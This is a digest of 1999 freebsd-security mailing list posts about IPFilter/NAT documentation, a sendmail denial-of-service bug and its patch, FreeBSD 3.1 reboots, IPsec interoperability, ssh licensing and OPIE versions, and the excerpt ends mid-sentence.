<01BE8653.67C58CC0.thomas.uhrfelt@plymovent.se> From: Thomas Uhrfelt Reply-To: "thomas.uhrfelt@plymovent.se" To: "'freebsd-security@freebsd.org'" Subject: Re: IPFilter? Date: Wed, 14 Apr 1999 08:41:36 +0200 Organization: Plymovent AB X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I already bought the 'Building Internet Firewalls' and its a good book, and I got the theoretic side of building a firewall pretty much nailed down. What I am missing is FreeBSD specific things + IPFilter/NAT things. I am new to the FreeBSD community and can't find any good documentation covering these. Neither is the IPFilter package filled with any "good" newcomer docs. I really think IPFilter and IPNat should be covered in the handbook since its a kernel option nowdays. Do you have any links for good FreeBSD+IPFilter pages? Regards, Thomas Uhrfelt [cut ] Thomas, 1. I recommend buying some books and reading some web pages by gurus (not by some of the vendors!). OReilly's have some good books. try Building Inernet Firewalls by Chapman and Zwicky, or a book by Bellovin and Cheswick (I don't recall the published just now). 2. Yes, don't go for any OS with a history of continuing weaknesses. And perferrably add in some defence in depth, by using choking routers externally and internally. Good luck (but really there is no luck - just use a good scientific approach). Cheers, Gary [ end cut ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 0:45:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from quackerjack.cc.vt.edu (quackerjack.cc.vt.edu [198.82.160.250]) by hub.freebsd.org (Postfix) with ESMTP id 566D714ED5 for ; Wed, 14 Apr 1999 00:45:38 -0700 (PDT) (envelope-from jobaldwi@vt.edu) Received: from sable.cc.vt.edu (sable.cc.vt.edu [128.173.16.30]) by quackerjack.cc.vt.edu (8.8.8/8.8.8) with ESMTP id DAA10264; Wed, 14 Apr 1999 03:43:18 -0400 (EDT) Received: from john.baldwin.cx (jobaldwi.campus.vt.edu [198.82.67.63]) by sable.cc.vt.edu (8.8.8/8.8.8) with ESMTP id DAA27867; Wed, 14 Apr 1999 03:43:17 -0400 (EDT) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <01BE8653.67C58CC0.thomas.uhrfelt@plymovent.se> Date: Wed, 14 Apr 1999 03:43:17 -0400 (EDT) From: John Baldwin To: Thomas Uhrfelt Subject: Re: IPFilter? Cc: "freebsd-security@freebsd.org" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 14-Apr-99 Thomas Uhrfelt wrote: > > I already bought the 'Building Internet Firewalls' and its a good book, and > I got the theoretic side of building a firewall pretty much nailed down. > What I am missing is FreeBSD specific things + IPFilter/NAT things. I am > new to the FreeBSD community and can't find any good documentation covering > these. Neither is the IPFilter package filled with any "good" newcomer > docs. I really think IPFilter and IPNat should be covered in the handbook > since its a kernel option nowdays. > > Do you have any links for good FreeBSD+IPFilter pages? If you read the FAQ, and follow question 10.6. Does FreeBSD support NAT or Masquerading, it has a link to the natd manpage: http://www.freebsd.org/cgi/man.cgi?natd. The section "Running NATD" gives step by step instructions on getting NAT up and running. For manpages in general, you can go to http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE I believe that you can use ipfw ('man ipfw' at the URL above) to do the same stuff as IPFilter. > Regards, > > Thomas Uhrfelt --- John Baldwin -- http://members.freedomnet.com/~jbaldwin/ PGP Key: http://members.freedomnet.com/~jbaldwin/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 8:36:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from volodya.prime.net.ua (volodya.prime.net.ua [195.64.229.17]) by hub.freebsd.org (Postfix) with ESMTP id 39CE315193 for ; Wed, 14 Apr 1999 08:36:27 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost.prime.net.ua [127.0.0.1]) by volodya.prime.net.ua (8.8.8/8.8.8) with ESMTP id SAA00838 for ; Wed, 14 Apr 1999 18:41:19 +0300 (EEST) (envelope-from andyo@prime.net.ua) Message-ID: <3714B71B.5420EB1F@prime.net.ua> Date: Wed, 14 Apr 1999 18:41:17 +0300 From: "Andy V. Oleynik" Organization: M-Info X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Sendmail up to 8.9.2 vulnerability Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, everybody, recently I've read about subj (src: http://www.rootshell.com/beta), got a simple c-program to test my sendmail. I'm running a test now, but what I would ask: bugdiscoverer writes following in his msg: " If you noticed increased LA during attack, your machine is vulnerable. " What does he mean under "LA"? And may be some of U has appropriate patch for subj? -- WBW Andy V. Oleynik (When U work in virtual office U have good chance to obtain virtual money ö%-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 9:28:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 04F2F14FF5 for ; Wed, 14 Apr 1999 09:28:03 -0700 (PDT) (envelope-from thrush@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id RAA02896 for ; Wed, 14 Apr 1999 17:25:39 +0100 (BST) Reply-To: "Theodore Rush" From: "Theodore Rush" To: Subject: FreeBSD 3.1 Reboots Date: Sun, 18 Apr 1999 17:25:47 +0100 Message-ID: <01be89b8$1e0e6440$380051c2@greg.qmpgmc.ac.uk> MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello everybody, This is a little involved so I'll try to brief: Basically I was using FreeBSD 3.0... (because I needed some of the features ASAP) I sat on this version for quite some time ... and yes I got attacked using the exploit: "IP fragmentation denial of service" ... well so we believe... The machine would reboot every couple of hours. So I upgraded to FreeBSD 3.1 - 10 days ago .... then nothing.... no problems for 10 whole days!!! Now as of 50 minutes ago ...suddenly the machine REBOOTS. Any ideas? Regards Greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 9:34:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id ABD0F15774 for ; Wed, 14 Apr 1999 09:34:48 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id MAA04706; Wed, 14 Apr 1999 12:32:20 -0400 (envelope-from jared) Date: Wed, 14 Apr 1999 12:32:20 -0400 From: Jared Mauch To: "Andy V. Oleynik" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sendmail up to 8.9.2 vulnerability Message-ID: <19990414123220.A4631@puck.nether.net> Mail-Followup-To: "Andy V. Oleynik" , freebsd-security@FreeBSD.ORG References: <3714B71B.5420EB1F@prime.net.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <3714B71B.5420EB1F@prime.net.ua>; from Andy V. Oleynik on Wed, Apr 14, 1999 at 06:41:17PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org LA typically == Load Average. On Wed, Apr 14, 1999 at 06:41:17PM +0300, Andy V. Oleynik wrote: > Hi, everybody, > recently I've read about subj (src: http://www.rootshell.com/beta), > got a simple c-program to test my sendmail. > I'm running a test now, but what I would ask: > bugdiscoverer writes following in his msg: > " > If you noticed increased LA during attack, > your machine is vulnerable. > " > What does he mean under "LA"? > And may be some of U has appropriate patch for subj? > > -- > WBW Andy V. Oleynik (When U work in virtual office > U have good chance to obtain virtual money ?%-) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 9:36: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 820A6152C9 for ; Wed, 14 Apr 1999 09:35:57 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id KAA02272; Wed, 14 Apr 1999 10:33:36 -0600 (MDT) From: David G Andersen Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id KAA17779; Wed, 14 Apr 1999 10:33:35 -0600 (MDT) Message-Id: <199904141633.KAA17779@lal.cs.utah.edu> Subject: Re: Sendmail up to 8.9.2 vulnerability To: andyo@prime.net.ua (Andy V. Oleynik) Date: Wed, 14 Apr 1999 10:33:34 -0600 (MDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <3714B71B.5420EB1F@prime.net.ua> from "Andy V. Oleynik" at Apr 14, 99 06:41:17 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Andy V. Oleynik once said: > > Hi, everybody, > recently I've read about subj (src: http://www.rootshell.com/beta), > got a simple c-program to test my sendmail. > I'm running a test now, but what I would ask: > bugdiscoverer writes following in his msg: > " > If you noticed increased LA during attack, > your machine is vulnerable. > " > What does he mean under "LA"? > And may be some of U has appropriate patch for subj? Load average. It's a denial of service attack; the exploit you downloaded is designed to be somewhat nice, and simply slow the machine down by a small amount. It's not all that exciting. Still, there's no harm in upgrading. :-) -Dave -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 9:46:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.gte.net (smtp1.gte.net [207.115.153.30]) by hub.freebsd.org (Postfix) with ESMTP id B878215497 for ; Wed, 14 Apr 1999 09:46:29 -0700 (PDT) (envelope-from orthoefe@gte.net) Received: from localhost (dt021nec.tampabay.rr.com [24.92.8.236]) by smtp1.gte.net with SMTP for ; id LAA03016 Wed, 14 Apr 1999 11:43:56 -0500 (CDT) Date: Wed, 14 Apr 1999 12:47:22 -0400 (EDT) From: Joe Orthoefer X-Sender: orthoefe@localhost To: freebsd-security@freebsd.org Subject: KAME ipsec and cisco IOS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is it currently possible to get a cisco with ipsec and a freebsd box running the KAME stuff to pass encrypted traffic back and forth (ipv4+ipsec)? I realize the problem is principly the key management between the two. Has anyone even attempted this? Is there a better place to ask this question? Thanks, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 10:25:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from itesec.hsc.fr (itesec.hsc.fr [192.70.106.33]) by hub.freebsd.org (Postfix) with ESMTP id C759E1559F for ; Wed, 14 Apr 1999 10:25:19 -0700 (PDT) (envelope-from Alain.Thivillon@hsc.fr) Received: from yoko.hsc.fr (yoko.hsc.fr [192.70.106.76]) by itesec.hsc.fr (Postfix) with ESMTP id 9CB1510E22; Wed, 14 Apr 1999 19:22:58 +0200 (CEST) Received: by yoko.hsc.fr (Postfix snapshot-19990409, from userid 1001) id 6614F12FCD0; Wed, 14 Apr 1999 19:22:53 +0200 (CEST) Date: Wed, 14 Apr 1999 19:22:53 +0200 From: Alain Thivillon To: "Andy V. Oleynik" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sendmail up to 8.9.2 vulnerability Message-ID: <19990414192253.D5661@yoko.hsc.fr> References: <3714B71B.5420EB1F@prime.net.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.95.1i In-Reply-To: <3714B71B.5420EB1F@prime.net.ua>; from Andy V. Oleynik on Wed, Apr 14, 1999 at 06:41:17PM +0300 X-Organization: Herve Schauer Consultants Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Andy V. Oleynik" écrivait (wrote) : > What does he mean under "LA"? Load Average. Sendmail eats all processing power during header parsing, if you open 15 simultaneous sessions sending lot of headers, your load average (ie number of runnable processes) will mount as high as 15, then sendmail will refuse new connections (according to RefuseLa parameter, by default 12). > And may be some of U has appropriate patch for subj? Install 8.9.3, who introduces 32K limit for total headers size and breaks connection after that. Symptom is still here, but consequences are more limited. -- Alain Thivillon -+- Alain.Thivillon@hsc.fr -+- Hervé Schauer Consultants Pgp Key ID: 0x57155CC9 AT1718 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 11: 3:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id DDD2C15057 for ; Wed, 14 Apr 1999 11:03:37 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA11041; Wed, 14 Apr 1999 11:01:39 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: "Theodore Rush" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 Reboots In-reply-to: Your message of "Sun, 18 Apr 1999 17:25:47 BST." <01be89b8$1e0e6440$380051c2@greg.qmpgmc.ac.uk> Date: Wed, 14 Apr 1999 11:01:39 -0700 Message-ID: <11039.924112899@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Now as of 50 minutes ago ...suddenly the machine REBOOTS. Without any details, it's impossible to say. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 11: 9:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from kiev.sovam.com (kiev.sovam.com [194.186.143.7]) by hub.freebsd.org (Postfix) with ESMTP id 92E5515057 for ; Wed, 14 Apr 1999 11:09:42 -0700 (PDT) (envelope-from doka@kiev.sovam.com) Received: from doka (helo=localhost) by kiev.sovam.com with local-esmtp (Exim 2.12 #1) id 10XU41-000FHE-00; Wed, 14 Apr 1999 21:07:05 +0300 Date: Wed, 14 Apr 1999 21:07:04 +0300 (EEST) From: Vladimir Litovka To: freebsd-security@FreeBSD.ORG Cc: Theodore Rush Subject: Re: FreeBSD 3.1 Reboots In-Reply-To: <11039.924112899@zippy.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > > Now as of 50 minutes ago ...suddenly the machine REBOOTS. > > Without any details, it's impossible to say. The most possible cause - hardware problems. Check in order RAM, cache, motherboard, CPU, hardware's vendor. -- Yours sincerely, Vladimir Litovka, hostmaster of Sovam Teleport Kiev To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 13:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id EB4CF157ED for ; Wed, 14 Apr 1999 13:18:19 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.0) with SMTP id AAA26804; Thu, 15 Apr 1999 00:15:28 +0400 (MSD) Date: Thu, 15 Apr 1999 00:15:28 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: "Jordan K. Hubbard" Cc: Theodore Rush , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 Reboots In-Reply-To: <11039.924112899@zippy.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > Date: Wed, 14 Apr 1999 11:01:39 -0700 > From: "Jordan K. Hubbard" > To: Theodore Rush > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: FreeBSD 3.1 Reboots > > > Now as of 50 minutes ago ...suddenly the machine REBOOTS. > > Without any details, it's impossible to say. > It Possible. There is a problem in 3.1RELEASE. It reboots 1-2 times a day (in heavy load) because of VM error. The solution is to upgrade to 3.1Stable. Dmitry. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 13:38:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id E950A15875 for ; Wed, 14 Apr 1999 13:38:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA19198; Wed, 14 Apr 1999 14:35:42 -0600 (MDT) Message-Id: <4.2.0.32.19990414142800.00d14990@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Wed, 14 Apr 1999 14:34:09 -0600 To: Dmitry Valdov From: Brett Glass Subject: Re: FreeBSD 3.1 Reboots Cc: Theodore Rush , freebsd-security@FreeBSD.ORG In-Reply-To: References: <11039.924112899@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was a similar problem in 2.2.7 when it was compiled with certain kernel configurations. I found that removing the ATAPI and ATAPI_STATIC options caused many VM errors. Adding them back made the system stable. It took us a long time to discover this. 3.1-RELEASE was the first non-experimental point release in the 3.X tree. It always pays to wait for the second one before installing the OS on mission-critical systems. We're installing 3.1 on a few workstations, but will wait for 3.2-RELEASE (and will delay installing it for two weeks to make sure that there are no egregious problems) before moving away from 2.2.8 on the servers. Yep, I know this sounds incredibly paranoid, but a sysadmin has to be. --Brett At 12:15 AM 4/15/99 +0400, Dmitry Valdov wrote: >On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > >> Date: Wed, 14 Apr 1999 11:01:39 -0700 >> From: "Jordan K. Hubbard" >> To: Theodore Rush >> Cc: freebsd-security@FreeBSD.ORG >> Subject: Re: FreeBSD 3.1 Reboots >> >> > Now as of 50 minutes ago ...suddenly the machine REBOOTS. >> >> Without any details, it's impossible to say. >> > >It Possible. >There is a problem in 3.1RELEASE. It reboots 1-2 times a day (in heavy >load) because of VM error. >The solution is to upgrade to 3.1Stable. > >Dmitry. > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 14:41:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id D651E15824 for ; Wed, 14 Apr 1999 14:41:02 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA04168; Wed, 14 Apr 1999 17:38:51 -0400 (EDT) From: "Allen Smith" Message-Id: <9904141738.ZM4166@beatrice.rutgers.edu> Date: Wed, 14 Apr 1999 17:38:50 -0400 In-Reply-To: Brett Glass "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 5:13pm) References: <4.2.0.32.19990412152634.00ce0bb0@localhost> <4.2.0.32.19990412160742.00c35dc0@localhost> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Brett Glass , "Gregory P. Smith" Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Igor Roshchin , security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 12, 5:13pm, Brett Glass (possibly) wrote: > Berkeley licensing would also allow cryptographers to review the code, > but would have the advantage that people could incorporate it not > just as a library but as an integral part of a product. Umm... Berkeley licensing means that people can review the _original_ code. It doesn't mean that people can review the code that is actually used in the product. > Also, Richard Stallman has pretty much decreed that the LGPL is > history as far as FSF and "GNU" projects are concerned. > They'll use the GPL on their libraries in an attempt to force > companies to give up their work. This will backfire, of course, > and we'll wind up with incompatible implementations. I agree that this qualifies as stupid. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 14:44: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id A454415824 for ; Wed, 14 Apr 1999 14:44:06 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA04182; Wed, 14 Apr 1999 17:41:34 -0400 (EDT) From: "Allen Smith" Message-Id: <9904141741.ZM4180@beatrice.rutgers.edu> Date: Wed, 14 Apr 1999 17:41:34 -0400 In-Reply-To: 0x1c "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 8:15pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: 0x1c Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 12, 8:15pm, 0x1c (possibly) wrote: > On Mon, 12 Apr 1999, Allen Smith wrote: > > > On Apr 12, 4:30pm, Brett Glass (possibly) wrote: > > > A GPLed implementation would be a bad idea, because it would prevent > > > the code from being incorporated into commercial products and thus > > > discourage standardization. This is one situation in which BSD-type > > > licensing would be infinitely preferable. > > > > Actually, what would be preferable is some form of GNU _library_ > > license. I'm not willing to trust an encryption program unless I > > know independent cryptographers have reviewed the code. For that matter, I'm not willing to trust _anything_ on security unless the code is available... this is one reason we're using FreeBSD for a firewall. > How does the licence (gpl, lgpl, or bsd) have anything to do with > independent cryptographers reviewing the code? The only crucial > requirement is that the relevant source be available for analysis. A gpl or lgpl license mandates the widest possible availability for review of the code. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 17:14: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from kitsune.swcp.com (swcp.com [198.59.115.2]) by hub.freebsd.org (Postfix) with ESMTP id 155D21525F for ; Wed, 14 Apr 1999 17:13:58 -0700 (PDT) (envelope-from synk@swcp.com) Received: (from synk@localhost) by kitsune.swcp.com (8.8.8/1.2.3) id SAA02517; Wed, 14 Apr 1999 18:11:34 -0600 (MDT) Message-Id: <199904150011.SAA02517@kitsune.swcp.com> Subject: Re: IPFilter? To: jobaldwi@vt.edu (John Baldwin) Date: Wed, 14 Apr 1999 18:11:34 -0600 (MDT) From: "Brendan Conoboy" Cc: freebsd-security@freebsd.org In-Reply-To: from "John Baldwin" at Apr 14, 99 03:43:17 am X-Mailer: ELM [version 2.4 PL25 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If you read the FAQ, and follow question 10.6. Does FreeBSD support NAT or > Masquerading, it has a link to the natd manpage: > http://www.freebsd.org/cgi/man.cgi?natd. > > The section "Running NATD" gives step by step instructions on getting NAT up > and running. For manpages in general, you can go to > http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE > > I believe that you can use ipfw ('man ipfw' at the URL above) to do the same > stuff as IPFilter. > > John Baldwin -- http://members.freedomnet.com/~jbaldwin/ Hi John, IP Filter comes with its own NAT, entirely separate from natd. I prefer IP filter to IPFW and imagine others might as well. The original poster is right though, the documentation is severely lacking. I could write something up if there's support (IE, somebody says "hey, do the groundwork for this, I'll edit it, then throw it into the handbook"), but it wouldn't be a complete documentary on ipfilter's features. Perhaps this is still better than what is available now. Speaking of which, is anybody using ipfilter's ftp proxy successfully? I have successful kernel panics, but the delight in this is fleeting. -Brendan (synk@swcp.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 17:40:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [209.157.93.60]) by hub.freebsd.org (Postfix) with ESMTP id 172F214D18 for ; Wed, 14 Apr 1999 17:40:13 -0700 (PDT) (envelope-from daver@kizmiaz.dis.org) Received: (from daver@localhost) by kizmiaz.dis.org (8.9.2.Beta4/8.9.2.Beta4) id RAA18416 for freebsd-security@freebsd.org; Wed, 14 Apr 1999 17:37:52 -0700 (PDT) Date: Wed, 14 Apr 1999 17:37:52 -0700 (PDT) From: Evil Dave Message-Id: <199904150037.RAA18416@kizmiaz.dis.org> To: freebsd-security@freebsd.org Subject: OPIE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hiya folks. the version of OPIE in /usr/src/contrib/opie is version 2.31. version 2.32 was released well over a year ago. I'm told that to upgrade this (well, to put the newer minor revision in place) i need some help from someone with contrib access. any takers? i have a pam opie lib built from the 2.31 tree and it works, but i'd like to see the newer (again, over a year old) version put in place in case someone ever decides to make a pam module out of the newer release. i'm sure using 2.31 isnt all that bad, and it works well for me. i find it odd that s/key is supported so widely while OPIE seems ignored. Bellcore gave up s/key and the naval research labs took it over. They had to rename it so they decided on OPIE (one-time passwords in everything) and implemented md5, which, if i'm not mistaken, was not in s/key at the time. i'm not sure about s/key, did they ever implement md5? OPIE is clearly newer and better. but i'm sure i'm reciting ancient and boring history to most of you. the 2.31 version was released 3/20/1997. the 2.32 version was released 1/1/1998. thanks for your time. dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 19: 3:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7C2F014F69 for ; Wed, 14 Apr 1999 19:03:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id UAA22224; Wed, 14 Apr 1999 20:00:45 -0600 (MDT) Message-Id: <4.2.0.32.19990414195738.0459a3a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Wed, 14 Apr 1999 20:00:43 -0600 To: "Allen Smith" , 0x1c From: Brett Glass Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG In-Reply-To: <9904141741.ZM4180@beatrice.rutgers.edu> References: <0x1c Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:41 PM 4/14/99 -0400, Allen Smith wrote: >A gpl or lgpl license mandates the widest possible availability for >review of the code. No, it does not, because commercial products will not USE the code. The GPL prevents them from putting it into a commercial product. They'll have to reimplement, which means -- guess what? -- unreviewed code. The LGPL is now deprecated; no new "GNU" software will be released under that license anymore. This is because Stallman, drunk with the success of Linux, feels that he can now impose his anti-commercial agenda on the world (sigh). I think that there's 